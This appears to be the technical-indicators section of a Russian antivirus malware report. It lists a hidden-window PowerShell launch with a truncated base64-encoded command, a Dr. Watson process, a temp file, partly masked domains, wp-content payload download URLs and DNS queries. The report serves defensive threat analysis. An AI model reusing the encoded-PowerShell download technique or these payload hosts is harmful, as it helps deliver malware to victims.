Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -w hidden -en JABBAHIAaABmAGoAYgB1AHIAYgA9ACcASQBpAGYAaQB5AGMAdAB1AGEAegBrACcAOwAkAEoAcQB0AHYAcgB2AHkAdgBoAGIAIAA9ACAAJwA5ADUAOAAnADsAJABVAG4AcABtAHQAYQBjAGEAPQAnAEMAbQB5AGcAcQBsAGMAaQBkACcAOwA...
- '%CommonProgramFiles%\Microsoft Shared\DW\DW20.EXE' -x -s 1568
- %TEMP%\1367707.cvr
- 're#####ant-flaveur.com':80
- 're#####ant-flaveur.com':443
- 'te##.###testudiozadar.com':80
- http://re#####ant-flaveur.com/wp-content/cBuLzTJSV/
- http://te##.###testudiozadar.com/wp-content/EATEzsRmP/
- 're#####ant-flaveur.com':443
- DNS ASK re#####ant-flaveur.com
- DNS ASK wp#####.xtoreapp.com
- DNS ASK 69##.com
- DNS ASK ra###bataka.com
- DNS ASK te##.###testudiozadar.com
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -w hidden -en JABBAHIAaABmAGoAYgB1AHIAYgA9ACcASQBpAGYAaQB5AGMAdAB1AGEAegBrACcAOwAkAEoAcQB0AHYAcgB2AHkAdgBoAGIAIAA9ACAAJwA5ADUAOAAnADsAJABVAG4AcABtAHQAYQBjAGEAPQAnAEMAbQB5AGcAcQBsAGMAaQBkACcAOwA...' (со скрытым окном)